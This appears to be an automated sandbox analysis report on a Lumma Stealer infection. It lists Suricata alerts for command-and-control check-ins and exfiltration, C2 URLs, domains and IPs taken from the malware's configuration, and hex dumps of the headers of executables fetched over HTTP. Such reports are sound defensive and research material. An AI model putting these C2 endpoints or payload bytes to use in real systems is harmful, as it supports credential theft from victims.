Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49716 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49739 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50002 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50003 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50003 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50010 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50017 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50050 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50060 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49995 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50004 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50004 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50024 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50028 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50024 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50028 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50044 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 38
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:14 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 31 e6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 51 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 68 6c 69 71 6f 6b 00 80 19 00 00 e0 30 00 00 72 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 75 78 63 76 76 67 00 10 00 00 00 60 4a 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:19 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 69 00 00 04 00 00 a1 56 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 74 7a 74 67 66 7a 00 70 19 00 00 50 4f 00 00 6a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 66 63 73 68 79 61 00 10 00 00 00 c0 68 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 68 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:08:22 GMTContent-Type: application/octet-streamContent-Length: 2863616Last-Modified: Thu, 24 Oct 2024 15:30:40 GMTConnection: keep-aliveETag: "671a6820-2bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 34 12 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 6e 68 69 61 6a 68 71 00 60 2b 00 00 a0 00 00 00 52 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 6d 76 6a 68 65 6e 00 20 00 00 00 00 2c 00 00 04 00 00 00 8c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 90 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:08 GMTContent-Type: application/octet-streamContent-Length: 2949632Last-Modified: Thu, 24 Oct 2024 16:05:58 GMTConnection: keep-aliveETag: "671a7066-2d0200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 80 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 30 00 00 04 00 00 3f 06 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 7a 70 73 65 6b 6b 6f 00 70 2a 00 00 00 06 00 00 6c 2a 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 70 76 79 72 72 6f 6f 00 10 00 00 00 70 30 00 00 04 00 00 00 dc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 30 00 00 22 00 00 00 e0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:18 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 69 00 00 04 00 00 a1 56 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 74 7a 74 67 66 7a 00 70 19 00 00 50 4f 00 00 6a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 66 63 73 68 79 61 00 10 00 00 00 c0 68 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 68 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 15:30:13 GMTConnection: keep-aliveETag: "671a6805-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 67 1a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 74 e9 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 24 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:35 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 